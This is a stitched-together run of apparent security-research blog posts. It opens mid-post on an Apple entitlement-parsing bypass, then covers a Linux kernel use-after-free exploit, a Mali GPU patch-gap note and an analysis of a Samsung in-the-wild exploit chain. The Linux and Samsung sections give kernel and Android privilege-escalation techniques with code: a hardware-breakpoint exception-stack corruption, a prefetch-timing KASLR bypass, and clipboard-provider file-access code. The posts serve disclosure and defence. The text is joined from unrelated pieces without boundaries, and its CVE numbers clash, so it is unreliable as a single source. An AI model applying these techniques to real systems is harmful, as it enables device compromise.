Initially, I wrote these hooks using TinyInst’s general-purpose low-level instrumentation API. However, since this process was more cumbersome than necessary, in the meantime I created an API specifically for function hooking. So instead of linking to my initial implementation that I sent with the bug report to Apple, let me instead show how the hooks would be implemented using the new TinyInst Hook API:
HookReplace (base class for our 2 hooks) is a helper class used to completely replace the function implementation with the hook. CESizeSerializationHook::OnFunctionEntered() and CESerializeWithOptionsHook::OnFunctionEntered() are the bodies of the hooks. Additional code is needed to read the replacement entitlement DER and also to retrieve the value of kCENoError, which is a value libCoreEntitlements functions return on success and that we must return from our hooked versions. Note that, on macOS Monterey, CESerializeWithOptions should be replaced with CESerialize and the 3rd argument will be the output address rather than the 4th.
So, with that in place, I could sign a binary using DER provided in the entitlements.der file.
Now, with the tooling in place, the question becomes, how to exploit it. Or rather, which entitlement to target. In order to exploit the issue, we need to find an entitlement check that is ultimately made using CEContextQuery API. Unfortunately, that rules out most userspace daemons - all the ones I looked at still did entitlement checking the “old way”, by first obtaining a dictionary representation of entitlements. That leaves “just” the entitlement checks done by the OS kernel.
Fortunately, a lot of checks in the kernel are made using the vulnerable API. Some of these checks are done by AppleMobileFileIntegrity itself using functions like OSEntitlements::queryEntitlementsFor, AppleMobileFileIntegrity::AMFIEntitlementGetBool or proc_has_entitlement. But there are other APIs as well. For example, the IOTaskHasEntitlement and IOCurrentTaskHasEntitlement functions that are used from over a hundred places in the kernel (according to macOS Monterey kernel cache) end up calling CEContextQuery (by first calling amfi->OSEntitlements_query()).
One other potentially vulnerable API was IOUserClient::copyClientEntitlement, but only on Apple silicon, where pmap_cs_enabled() is true. Although I didn’t test this, there is some indication that in that case the CEContextQuery API or something similar to it is used. IOUserClient::copyClientEntitlement is most notably used by device drivers to check entitlements.
I attempted to exploit the issue on both macOS and iOS. On macOS, I found places where such an entitlement bypass could be used to unlock previously unreachable attack surfaces, but nothing that would immediately provide a stand-alone exploit. In the end, to report something while looking for a better primitive, I reported that I was able to invoke functionality of the kext_request API (kernel extension API) that I normally shouldn’t be able to do, even as the root user. At the time, I did my testing on macOS Monterey, versions 12.6 and 12.6.1.
On iOS, exploiting such an issue would potentially be more interesting, as it could be used as part of a jailbreak. I was experimenting with iOS 16.1 and nothing I tried seemed to work, but due to the lack of introspection on the iOS platform I couldn’t figure out why at the time.
That is, until I received a reply from Apple on my macOS report, asking me if I can reproduce on macOS Ventura. macOS Ventura was just released in the same week when I sent my report to Apple and I was hesitant to upgrade to a new major version while having a working setup on macOS Monterey. But indeed, when I upgraded to Ventura, and after making sure my tooling still works, the DER issue wouldn’t reproduce anymore. This was likely also the reason all of my iOS experiments were unsuccessful: iOS 16 shares the codebase with macOS Ventura.
It appears that the issue was fixed due to refactoring and not as a security issue (macOS Monterey would have been updated in this case as well, as Apple releases some security patches not just for the latest major version of macOS, but also for the two previous ones). Looking at the code, it appears the API libCoreEntitlements uses to do low-level DER parsing has changed somewhat - on macOS Monterey, libCoreEntitlements used mostly ccder_decode* functions to interact with DER, while on macOS Ventura ccder_blob_decode* functions are used more often. The latter additionally take the parent DER structure as input and thus make processing of hierarchical DER structures somewhat less error-prone. As a consequence of this change, der_vm_execute_nocopy continues processing the next key/value sequence after the end of the current one (which is the intended behavior) and not, as before, after the end of the value object. At this point, since I could no longer reproduce the issue on the latest OS release, I was no longer motivated to write the exploit and stopped my efforts in order to focus on other projects.
Apple addressed the issue as CVE-2022-42855 on December 13, 2022. While Apple applied the CVE to all supported versions of their operating systems, including macOS Ventura and iOS 16, on those latest OS versions the patch seems to serve as an additional validation step. Specifically, on macOS Ventura, the patch is applied to the function der_decode_key_value and makes sure that the key/value sequence does not contain other elements besides just the key and the value (in other words, it makes sure that the length of the sequence matches the combined length of the key and value objects).
Conclusion
It is difficult to claim that a particular code base has no vulnerabilities. While that might be possible for a specific type of vulnerability, it is difficult, and potentially impossible, to predict all types of vulnerabilities a complex codebase might have. After all, you can’t reason about what you don’t know.
While DER encoding is certainly a much safer choice than XML when it comes to parsing logic issues, this blog post demonstrates that such issues are still possible even with the DER format.
And what about the SHA1 collision? While the identical prefix attack shouldn’t work against DER, doesn’t that still leave the chosen prefix attack? Maybe, but that’s something to explore another time. Or maybe (hopefully) Apple will remove SHA1 support in their signature blobs and there will be nothing to explore at all.
This blog post details an exploit for CVE-2022-42703 (P0 issue 2351 - Fixed 5 September 2022), a bug Jann Horn found in the Linux kernel's memory management (MM) subsystem that leads to a use-after-free on struct anon_vma. As the bug is very complex (I certainly struggle to understand it!), a future blog post will describe the bug in full. For the time being, the issue tracker entry, this LWN article explaining what an anon_vma is and the commit that introduced the bug are great resources in order to gain additional context.
Setting the scene
Successfully triggering the underlying vulnerability causes folio->mapping to point to a freed anon_vma object. Calling madvise(..., MADV_PAGEOUT) can then be used to repeatedly trigger accesses to the freed anon_vma in folio_lock_anon_vma_read():
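Abridged, the relevant part of that function looks roughly like this (simplified from mm/rmap.c of that era; the signature and some details are trimmed):

struct anon_vma *folio_lock_anon_vma_read(struct folio *folio)
{
	struct anon_vma *anon_vma = NULL;
	struct anon_vma *root_anon_vma;
	unsigned long anon_mapping;

	rcu_read_lock();
	anon_mapping = (unsigned long)READ_ONCE(folio->mapping);
	if ((anon_mapping & PAGE_MAPPING_FLAGS) != PAGE_MAPPING_ANON)
		goto out;
	if (!folio_mapped(folio))
		goto out;

	/* anon_mapping points into the freed anon_vma... */
	anon_vma = (struct anon_vma *)(anon_mapping - PAGE_MAPPING_ANON);
	root_anon_vma = READ_ONCE(anon_vma->root);
	/* ...so this locks a rwsem at an address read from freed memory */
	if (down_read_trylock(&root_anon_vma->rwsem)) {
		/* ... */
	}
	/* ... */
out:
	rcu_read_unlock();
	return anon_vma;
}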
One potential exploit technique is to let the function return the dangling anon_vma pointer and try to make the subsequent operations do something useful. Instead, we chose to use the down_read_trylock() call within the function to corrupt memory at a chosen address, which we can do if we can control the root_anon_vma pointer that is read from the freed anon_vma.
Controlling the root_anon_vma pointer means reclaiming the freed anon_vma with attacker-controlled memory. struct anon_vma structures are allocated from their own kmalloc cache, which means we cannot simply free one and reclaim it with a different object. Instead we cause the associated anon_vma slab page to be returned back to the kernel page allocator by following a very similar strategy to the one documented here. By freeing all the anon_vma objects on a slab page, then flushing the percpu slab page partial freelist, we can cause the virtual memory previously associated with the anon_vma to be returned back to the page allocator. We then spray pipe buffers in order to reclaim the freed anon_vma with attacker controlled memory.
At this point, we’ve discussed how to turn our use-after-free into a down_read_trylock() call on an attacker-controlled pointer. The implementation of down_read_trylock() is as follows:
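On the kernels in question this boils down to __down_read_trylock() (kernel/locking/rwsem.c, abridged here; RWSEM_READER_BIAS is 0x100, and RWSEM_READ_FAILED_MASK covers the three least significant bits plus the most significant bit):

static inline int __down_read_trylock(struct rw_semaphore *sem)
{
	long tmp;

	tmp = atomic_long_read(&sem->count);
	while (!(tmp & RWSEM_READ_FAILED_MASK)) {
		if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,
						    tmp + RWSEM_READER_BIAS)) {
			rwsem_set_reader_owned(sem);
			return 1;
		}
	}
	return 0;
}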
It was helpful to emulate the down_read_trylock() in unicorn to determine how it behaves when given different sem->count values. Assuming this code is operating on inert and unchanging memory, it will increment sem->count by 0x100 if the 3 least significant bits and the most significant bit are all unset. That means it is difficult to modify a kernel pointer and we cannot modify any non 8-byte aligned values (as they’ll have one or more of the bottom three bits set). Additionally, this semaphore is later unlocked, causing whatever write we perform to be reverted in the imminent future. Furthermore, at this point we don’t have an established strategy for determining the KASLR slide nor figuring out the addresses of any objects we might want to overwrite with our newfound primitive. It turns out that regardless of any randomization the kernel presently has in place, there’s a straightforward strategy for exploiting this bug even given such a constrained arbitrary write.
Stack corruption…
On x86-64 Linux, when the CPU performs certain interrupts and exceptions, it will swap to a respective stack that is mapped to a static and non-randomized virtual address, with a different stack for the different exception types. Brief documentation of those stacks and their parent structure, the cpu_entry_area, can be found here. These stacks are most often used on entry into the kernel from userland, but they’re used for exceptions that happen in kernel mode as well. We’ve recently seen KCTF entries where attackers take advantage of the non-randomized cpu_entry_area stacks in order to access data at a known virtual address in kernel accessible memory even in the presence of SMAP and KASLR. You could also use these stacks to forge attacker-controlled data at a known kernel virtual address. This works because the attacker task’s general purpose register contents are pushed directly onto this stack when the switch from userland to kernel mode occurs due to one of these exceptions. This also occurs when the kernel itself generates an Interrupt Stack Table exception and swaps to an exception stack - except in that case, kernel GPRs are pushed instead. These pushed registers are later used to restore kernel state once the exception is handled. In the case of a userland triggered exception, register contents are restored from the task stack.
One example of an IST exception is a DB exception which can be triggered by an attacker via a hardware breakpoint, the associated registers of which are described here. Hardware breakpoints can be triggered by a variety of different memory access types, namely reads, writes, and instruction fetches. These hardware breakpoints can be set using ptrace(2), and are preserved during kernel mode execution in a task context such as during a syscall. That means that it’s possible for an attacker-set hardware breakpoint to be triggered in kernel mode, e.g. during a copy_to/from_user call. The resulting exception will save and restore the kernel context via the aforementioned non-randomized exception stack, and that kernel context is an exceptionally good target for our arbitrary write primitive.
Any of the registers that copy_to/from_user is actively using at the time it handles the hardware breakpoint are corruptible by using our arbitrary-write primitive to overwrite their saved values on the exception stack. In this case, the size of the copy_user call is the intuitive target. The size value is consistently stored in the rcx register, which will be saved at the same virtual address every time the hardware breakpoint is hit. After corrupting this saved register with our arbitrary write primitive, the kernel will restore rcx from the exception stack once it returns back to copy_to/from_user. Since rcx defines the number of bytes copy_user should copy, this corruption will cause the kernel to illicitly copy too many bytes between userland and the kernel.
…begets stack corruption
The attack strategy starts as follows:
Fork a process Y from process X.
Process X ptraces process Y, then sets a hardware breakpoint at a known virtual address [addr] in process Y.
Process Y makes a large number of calls to uname(2), which calls copy_to_user from a kernel stack buffer to [addr]. This causes the kernel to constantly trigger the hardware watchpoint and enter the DB exception handler, using the DB exception stack to save and restore copy_to_user state.
Simultaneously make many arbitrary writes at the known location of the DB exception stack’s saved rcx value, which is Process Y’s copy_to_user’s saved length (a sketch of steps 1-3 follows).
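A hedged sketch of steps 1-3 (illustrative only; the fixed address, the DR7 encoding, and the synchronization are simplifications, and error handling is omitted):

#include <signal.h>
#include <stddef.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void) {
  /* fixed, known address for the hardware watchpoint */
  struct utsname *addr = mmap((void *)0x13370000, 0x1000,
                              PROT_READ | PROT_WRITE,
                              MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
  pid_t pid = fork();
  if (pid == 0) {                        /* process Y */
    ptrace(PTRACE_TRACEME, 0, 0, 0);
    raise(SIGSTOP);                      /* wait for the watchpoint setup */
    for (;;)
      uname(addr);                       /* copy_to_user writes to the watched address */
  }
  waitpid(pid, NULL, 0);                 /* child stopped at SIGSTOP */
  /* DR0 = watched address; DR7 = 0xd0001 (L0 enabled, R/W0 = write, LEN0 = 4 bytes) */
  ptrace(PTRACE_POKEUSER, pid, (void *)offsetof(struct user, u_debugreg[0]), addr);
  ptrace(PTRACE_POKEUSER, pid, (void *)offsetof(struct user, u_debugreg[7]),
         (void *)0xd0001);
  ptrace(PTRACE_CONT, pid, 0, 0);
  /* ...step 4, the arbitrary-write spam against the saved rcx, runs here... */
  for (;;)
    pause();
}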
The DB exception stack is used rarely, so it’s unlikely that we corrupt any unexpected kernel state via a spurious DB exception while spamming our arbitrary write primitive. The technique is also racy, but missing the race simply means corrupting stale stack-data. In that case, we simply try again. In my experience, it rarely takes more than a few seconds to win the race successfully.
Upon successful corruption of the length value, the kernel will copy much of the current task’s stack back to userland, including the task-local stack cookie and return addresses. We can subsequently invert our technique and attack a copy_from_user call instead. Instead of copying too many bytes from the kernel task stack to userland, we induce the kernel to copy too many bytes from userland to the kernel task stack! Again we use a syscall, prctl(2), that performs a copy_from_user call to a kernel stack buffer. Now by corrupting the length value, we generate a stack buffer overflow condition in this function where none previously existed. Since we’ve already leaked the stack cookie and the KASLR slide, it is trivial to bypass both mitigations and overwrite the return address.
Completing a ROP chain for the kernel is left as an exercise to the reader.
Fetching the KASLR slide with prefetch
Upon reporting this bug to the Linux kernel security team, our suggestion was to start randomizing the location of the percpu cpu_entry_area (CEA), and consequently the associated exception and syscall entry stacks. This is an effective mitigation against remote attackers but is insufficient to prevent a local attacker from taking advantage. 6 years ago, Daniel Gruss et al. discovered a new more reliable technique for exploiting the TLB timing side channel in x86 CPUs. Their results demonstrated that prefetch instructions executed in user mode retired at statistically significant different latencies depending on whether the requested virtual address to be prefetched was mapped vs unmapped, even if that virtual address was only mapped in kernel mode. kPTI was helpful in mitigating this side channel; however, most modern CPUs now have innate protection for Meltdown, which kPTI was specifically designed to address, and thus kPTI (which has significant performance implications) is disabled on modern microarchitectures. That decision means it is once again possible to take advantage of the prefetch side channel to defeat not only KASLR, but also the CPU entry area randomization mitigation, preserving the viability of the CEA stack corruption exploit technique against modern x86 CPUs.
There are surprisingly few fast and reliable examples of this prefetch KASLR bypass technique available in the open source realm, so I made the decision to write one.
Implementation
The meat of implementing this technique effectively is in serially reading the processor’s time stamp counter before and after performing a prefetch. Daniel Gruss helpfully provided highly effective and open source code for doing just that. The only edit I made (as suggested by Jann Horn) was to swap to using lfence instead of cpuid as the serializing instruction, as cpuid is emulated in VM environments. It also became apparent in practice that there was no need to perform any cache-flushing routines in order to witness the side-channel effect. It is simply enough to time every prefetch attempt.
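A minimal sketch of that timing primitive (the exact prefetch instruction mix is an assumption modeled on the published code):

#include <stdint.h>

/* lfence-serialized rdtsc; lfence rather than cpuid so it also behaves in VMs */
static inline uint64_t rdtsc_serialized(void) {
  uint32_t lo, hi;
  __asm__ volatile("lfence\n\trdtsc\n\tlfence" : "=a"(lo), "=d"(hi));
  return ((uint64_t)hi << 32) | lo;
}

/* time a single prefetch attempt against a candidate kernel address */
static inline uint64_t time_prefetch(uint64_t kaddr) {
  uint64_t t0 = rdtsc_serialized();
  __asm__ volatile("prefetchnta (%0)\n\tprefetcht2 (%0)"
                   :: "r"(kaddr) : "memory");
  return rdtsc_serialized() - t0;
}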
Generating prefetch timings for all 512 possible KASLR slots yields quite a bit of fuzzy data in need of analyzing. To minimize noise, multiple samples of each tested address are taken, and the minimum value from that set of samples is used in the results as the representative value for an address. On the Tiger Lake CPU this test was primarily performed on, no more than 16 samples per slot were needed to generate exceptionally reliable results. Low-resolution minimum prefetch time slot identification narrows down the area to search in while avoiding false positives for the higher resolution edge-detection code which finds the precise address at which prefetch dramatically drops in run-time. The result of this effort is a PoC which can correctly identify the KASLR slide on my local machine with 99.999% accuracy (95% accuracy in a VM) while running faster than it takes to grep through kallsyms for the kernel base address.
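Building on the timing helper above, the per-slot minimum sampling might look like this (the slot count, base and stride are assumptions about the default x86-64 KASLR layout):

#include <stdint.h>

#define SLOTS   512
#define SAMPLES 16

void scan_slots(uint64_t min_time[SLOTS]) {
  const uint64_t base = 0xffffffff80000000ull; /* start of the kernel text KASLR range */
  const uint64_t step = 0x200000ull;           /* 2 MiB slot stride */
  for (int s = 0; s < SLOTS; s++) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < SAMPLES; i++) {        /* keep the minimum per slot */
      uint64_t t = time_prefetch(base + s * step);
      if (t < best)
        best = t;
    }
    min_time[s] = best;
  }
}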
This prefetch code does indeed work to find the locations of the randomized CEA regions in Peter Zijlstra’s proposed patch. However, the journey to that point produced code that demonstrates another deeply significant issue: KASLR is comprehensively compromised on x86 against local attackers, has been for the past several years, and will be for the indefinite future. There are presently no plans in place to resolve the myriad microarchitectural issues that lead to side channels like this one. Future work is needed in this area to preserve the integrity of KASLR; alternatively, it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.
Conclusion
This exploit demonstrates a highly reliable and agnostic technique that can allow a broad spectrum of uncontrolled arbitrary write primitives to achieve kernel code execution on x86 platforms. While it is possible to mitigate this exploit technique from a remote context, an attacker in a local context can utilize known microarchitectural side-channels to defeat the current mitigations. Additional work in this area might be valuable to continue to make exploitation more difficult, such as performing in-stack randomization so that the stack offset of the saved state changes on every taken IST exception. For now however, this remains a viable and powerful exploit strategy on x86 Linux.
Note: The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable.
Introduction
In June 2022, Project Zero researcher Maddie Stone gave a talk at FirstCon22 titled 0-day In-the-Wild Exploitation in 2022…so far. A key takeaway was that approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities. This finding is consistent with our understanding of attacker behavior: attackers will take the path of least resistance, and as long as vendors don't consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones.
The presentation discussed an in-the-wild exploit targeting the Pixel 6 and leveraging CVE-2021-39793, a vulnerability in the ARM Mali GPU driver used by a large number of other Android devices. ARM's advisory described the vulnerability as:
Title: Mali GPU Kernel Driver may elevate CPU RO pages to writable
CVE: CVE-2022-22706 (also reported in CVE-2021-39793)
Date of issue: 6th January 2022
Impact: A non-privileged user can get a write access to read-only memory pages [sic].
The week before FirstCon22, Maddie gave an internal preview of her talk. Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).
Taking a closer look
One of these issues (2334) led to kernel memory corruption, one (2331) led to physical memory addresses being disclosed to userspace, and the remaining three (2325, 2327, 2333) led to a physical page use-after-free condition. These would enable an attacker to continue to read and write physical pages after they had been returned to the system.
For example, by forcing the kernel to reuse these pages as page tables, an attacker with native code execution in an app context could gain full access to the system, bypassing Android's permissions model and allowing broad access to user data.
Anecdotally, we heard from multiple sources that the Mali issues we had reported collided with vulnerabilities available in the 0-day market, and we even saw at least one public reference.
In line with our 2021 disclosure policy update, we then waited an additional 30 days before derestricting our Project Zero tracker entries. Between late August and mid-September 2022, we derestricted these issues in the public Project Zero tracker: 2325, 2327, 2331, 2333, 2334.
When time permits and as an additional check, we test the effectiveness of the patches that the vendor has provided. This sometimes leads to follow-up bug reports where a patch is incomplete or a variant is discovered (for a recently compiled list of examples, see the first table in this blogpost), and sometimes we discover the fix isn't there at all.
In this case we discovered that all of our test devices which used Mali are still vulnerable to these issues. CVE-2022-36449 is not mentioned in any downstream security bulletins.
Conclusion
Just as users are recommended to patch as quickly as they can once a release containing security updates is available, so the same applies to vendors and companies. Minimizing the "patch gap" as a vendor in these scenarios is arguably more important, as end users (or other vendors downstream) are blocking on this action before they can receive the security benefits of the patch.
Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible.
Note: The three vulnerabilities discussed in this blog were all fixed in Samsung’s March 2021 release, as CVE-2021-25337, CVE-2021-25369, and CVE-2021-25370. To ensure your Samsung device is up to date, you can check under Settings that your device is running SMR Mar-2021 or later.
As defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the “ground truth” data about the vulnerabilities and exploit techniques they’re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there’s been tremendous progress in vendors transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.
While we understand that Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward, Samsung has committed to publicly sharing when vulnerabilities may be under limited, targeted exploitation, as part of their release notes.
We hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products.
The exploit sample
The Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a 3 vulnerability chain where all 3 vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.
The sample used three vulnerabilities, all patched in March 2021 by Samsung:
Arbitrary file read/write via the clipboard provider - CVE-2021-25337
Kernel information leak via sec_log - CVE-2021-25369
Use-after-free in the Display Processing Unit (DPU) driver - CVE-2021-25370
The exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOC depending on where they’re sold. For example, the Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC, while phones sold in most other places (e.g. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver, which are specific to the Exynos Samsung phones.
Examples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.
The in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we’ve seen in other campaigns this year. TAG and Project Zero published detailed analyses of one of these campaigns in June.
Vulnerability #1 - Arbitrary filesystem read and write
The exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit is running as the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn’t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user.
About Android content providers
In Android, Content Providers manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are required to implement six abstract methods: query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.
All applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.
The vulnerability
Samsung created a custom clipboard content provider that runs within the system server. The system server is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.
Samsung added a custom clipboard content provider to the system server. This custom clipboard provider is specifically for images. In the com.android.server.semclipboard.SemClipboardProvider class, there are the following variables:
CREATE_TABLE = " CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT, _data TEXT NOT NULL);";
Unlike content providers that live in “normal” apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn’t have a manifest for any permissions to go in. Therefore it’s up to the code within the system server to do its own access checking.
UPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead, its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk, which is where the entry for the SemClipboardProvider is declared.
Like “normal” app-defined components, the system server could use the android:permission attribute to control access to the provider, but it does not. Since no permission is required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!
The ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the openFileHelper method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a ParcelFileDescriptor object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the getFd method to get the native file descriptor (fd) for the returned ParcelFileDescriptor.
public Uri insert(Uri uri, ContentValues values) {
    long row = this.database.insert(TABLE_NAME, "", values);
    if (row > 0) {
        Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);
        getContext().getContentResolver().notifyChange(newUri, null);
        return newUri;
    }
    throw new SQLException("Fail to add a new record into " + uri);
}
The function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control included in this function so any app, including the untrusted_app SELinux context, can modify the _data column directly. By calling insert, an app can open files via the system server that it wouldn’t usually be able to open on its own.
The exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.
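A reconstruction of that code, consistent with the walkthrough below (the file path and the provider authority string are illustrative):

ContentValues vals = new ContentValues();
vals.put("_data", "/data/system/users/0/fileToWrite.bin");  // arbitrary, attacker-chosen path
Uri semclipboardUri = Uri.parse("content://com.sec.android.semclipboardprovider");
ContentResolver resolver = getContentResolver();
Uri newUri = resolver.insert(semclipboardUri, vals);        // no access check in the provider
return resolver.openFileDescriptor(newUri, "rw").getFd();   // raw fd opened by system_server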
Let’s walk through what is happening line by line:
1. Create a ContentValues object. This holds the key/value pair that the caller wants to insert into a provider’s database table. The key is the column name and the value is the row entry.
2. Set the ContentValues object: the key is set to “_data” and the value to an arbitrary file path, controlled by the exploit.
3. Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.
4. Get the ContentResolver object that allows apps access to ContentProviders.
5. Call insert on the semclipboardprovider with our key-value pair.
6. Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider’s openFile, which in this case simply calls openFileHelper.
The exploit wrote its next-stage binary to the directory /data/system/users/0/. The dropped file has an SELinux context of users_system_data_file. Normal untrusted_app domains don’t have access to open or create users_system_data_file files, so in this case the exploit proxies the open through system_server, which can open users_system_data_file. While untrusted_app can’t open users_system_data_file, it can read and write to it. Once the clipboard content provider opens the file and passes the fd to the calling process, the calling process can read and write to it.
The exploit first uses this fd to write their next stage ELF file onto the file system. The contents for the stage 2 ELF were embedded within the original sample.
This vulnerability is triggered three more times throughout the chain as we’ll see below.
Fixing the vulnerability
To fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks whether the UID of the calling process is 1000, meaning that it is already running with system privileges.
public Uri insert(Uri uri, ContentValues values) {
    if (Binder.getCallingUid() != 1000) {
        Log.e(TAG, "Fail to insert image clip uri. blocked the access of package : " + getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));
        return null;
    }
    long row = this.database.insert(TABLE_NAME, "", values);
    if (row > 0) {
        Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);
        getContext().getContentResolver().notifyChange(newUri, null);
        return newUri;
    }
    throw new SQLException("Fail to add a new record into " + uri);
}
Executing the stage 2 ELF
The exploit has now written its stage 2 binary to the file system, but how do they load it outside of their current app sandbox? Using the Samsung Text to Speech application (SamsungTTS.apk).
The Samsung Text to Speech application (com.samsung.SMT) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used to gain code execution as system. What’s different this time though is that the exploit doesn’t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.
Older versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the System.load API.
The exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service which will then load its stage 2 executable file as system UID and system_app SELinux context.
To do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses one of these two paths for its Settings file.
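A minimal reconstruction of the written settings file (the real file contains additional entries; the engine path value is whatever stage 2 path the exploit wrote):

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="SMT_LATEST_INSTALLED_ENGINE_PATH">/data/system/users/0/[stage 2 ELF path]</string>
</map>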
The SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load, and the stage 2 ELF begins executing as the system user in the system_app SELinux context.
The exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that performed this arbitrary file loading while others did not. App versions 3.0.04.14 and earlier included the arbitrary loading capability. Devices that shipped with Android 10 (Q) appear to have shipped with an updated version of the SamsungTTS app which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 shipped with version 3.0.08.18 of the SamsungTTS app, which does not include that functionality.
Phones released on Android P and earlier seem to have had a pre-3.0.08.18 version of the app, which does load the executable, up through at least December 2020. For example, the SamsungTTS app from an A50 device on the November 2020 security patch level was 3.0.03.22, which did load from the Settings file.
Once the ELF file is loaded via the System.load API, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.
Vulnerability #2 - task_struct and sys_call_table address leak
Once the second-stage ELF is running as system, the exploit continues. The second vulnerability (CVE-2021-25369) used by the chain is an information leak that discloses the addresses of the task_struct and sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.
The vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.
The exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break ASLR. WARN_ON is intended to be used only in situations where a kernel bug is detected, because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg.
void __warn(const char *file, int line, void *caller, unsigned taint,
            struct pt_regs *regs, struct warn_args *args)
{
        disable_trace_on_warning();

        pr_warn("------------[ cut here ]------------\n");

        if (file)
                pr_warn("WARNING: CPU: %d PID: %d at %s:%d %pS\n",
                        raw_smp_processor_id(), current->pid, file, line,
                        caller);
        else
                pr_warn("WARNING: CPU: %d PID: %d at %pS\n",
                        raw_smp_processor_id(), current->pid, caller);

        if (args)
                vprintk(args->fmt, args->args);

        if (panic_on_warn) {
                /*
                 * This thread may hit another WARN() in the panic path.
                 * Resetting this prevents additional WARN() from panicking the
                 * system on this thread. Other threads are blocked by the
                 * panic_mutex in panic().
                 */
                panic_on_warn = 0;
                panic("panic_on_warn set ...\n");
        }

        print_modules();
        dump_stack();
        print_oops_end_marker();

        /* Just a warning, don't kill lockdep. */
        add_taint(taint, LOCKDEP_STILL_OK);
}
On Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it’s not readable by the exploit.
